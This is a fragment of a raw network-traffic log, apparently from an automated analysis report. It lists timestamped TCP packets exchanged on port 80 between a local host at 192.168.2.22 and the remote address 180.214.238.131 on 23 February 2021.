Feb 23, 2021 11:34:28.531536102 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531543016 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531577110 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531590939 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531618118 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531625032 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531657934 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531697035 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531697989 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531716108 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531742096 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531744003 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531783104 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531797886 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531831026 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531842947 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531874895 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531891108 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531915903 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531929970 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531956911 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531970024 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531996965 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.532011032 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.532037020 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.532047033 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.532078028 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.532087088 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.532116890 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.532130003 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.532166004 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.532336950 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.747409105 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747471094 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747503042 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747540951 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747581959 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747622013 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747663975 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747704029 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.747739077 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.747786045 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.747792006 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.749684095 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.749741077 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.749783993 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.749824047 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.749862909 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.749891996 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.749905109 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.749913931 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.749928951 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.749948978 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.749979019 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750000000 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750021935 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750047922 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750056982 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750089884 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750118017 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750130892 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750140905 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750174046 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750190973 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750214100 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750242949 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750256062 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750257015 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750297070 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750332117 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750345945 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750351906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750394106 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750423908 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750433922 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750442982 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750484943 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750524998 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750525951 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750545025 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750566006 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750566959 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750610113 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750638962 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750648022 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750664949 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750699997 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750742912 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750775099 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750782967 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750796080 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750823975 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750850916 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750864029 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.750864983 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.750936031 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.752974987 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.753032923 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.753063917 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.753099918 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.753943920 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.753984928 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.754030943 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.754031897 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.754051924 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.754076958 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.754107952 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.754153967 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.755513906 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.755557060 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.755592108 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.755631924 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.755872965 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.755913019 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.755951881 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.755963087 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.755971909 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756025076 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756047964 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756062984 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756071091 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756112099 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756141901 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756153107 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756154060 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756191969 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756223917 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756237984 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756243944 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756279945 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756310940 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756325006 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756331921 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756376982 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756405115 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756416082 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756426096 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756457090 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756486893 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756495953 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756496906 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756536007 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756570101 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756576061 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756593943 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756616116 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756618977 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756664038 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756694078 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756706953 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756709099 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756746054 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756783009 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756784916 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756803036 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756824970 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756825924 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756864071 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756899118 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756903887 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756916046 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756943941 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.756947041 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.756993055 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757019997 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757029057 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757038116 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757076025 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757103920 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757116079 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757133007 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757154942 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757170916 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757194042 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757205009 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757234097 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757251978 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757275105 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757291079 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757316113 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757324934 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757369041 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757400036 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757411003 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757463932 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757504940 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757541895 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757544041 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757561922 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757584095 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757585049 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757626057 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757657051 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757666111 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757678986 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757707119 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757740021 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757756948 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757766008 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757800102 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757828951 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757839918 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757843018 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757882118 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757914066 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757922888 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757931948 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757962942 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.757989883 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.757998943 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.758002996 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.758044004 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.758071899 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.758085012 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.758094072 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.758163929 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.758725882 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.761099100 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971448898 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971512079 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971549988 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971574068 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971604109 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971615076 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971628904 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971666098 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971672058 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971713066 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971726894 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971755981 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971781969 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971798897 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971798897 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971843004 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971854925 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971884966 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971924067 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971927881 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971946955 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.971971035 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.971997023 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.972023010 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.972023964 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.972069979 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.972081900 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.972110033 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.972141981 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.972150087 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.972157955 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.972204924 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.974251986 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.974447012 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.974508047 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.974536896 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.974549055 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.974550009 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.974597931 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.974603891 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.974643946 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.974648952 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.974684000 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.974699020 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.974735022 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975275993 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975320101 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975336075 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975370884 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975372076 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975414991 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975425005 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975457907 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975464106 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975501060 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975532055 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975542068 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975585938 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975590944 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975596905 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975630045 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975671053 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975682974 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975689888 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975727081 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975735903 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975771904 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975789070 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975812912 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975826025 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975857019 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975872040 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975898981 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975913048 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975939035 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.975948095 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.975980997 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976023912 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976036072 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976047993 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976072073 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976118088 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976134062 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976140022 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976157904 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976166010 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976200104 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976205111 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976241112 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976253033 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976281881 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976319075 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976325035 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976358891 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976391077 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976433992 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976469994 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976480007 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976481915 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976516962 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976525068 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976526976 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976567984 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976581097 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976608992 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976617098 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976649046 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976658106 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976689100 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976723909 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976730108 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976733923 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976769924 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976807117 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976818085 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976855040 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976861954 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976861954 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976907015 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976912975 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.976948023 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.976984024 CET	49166	80	192.168.2.22	180.214.238.131
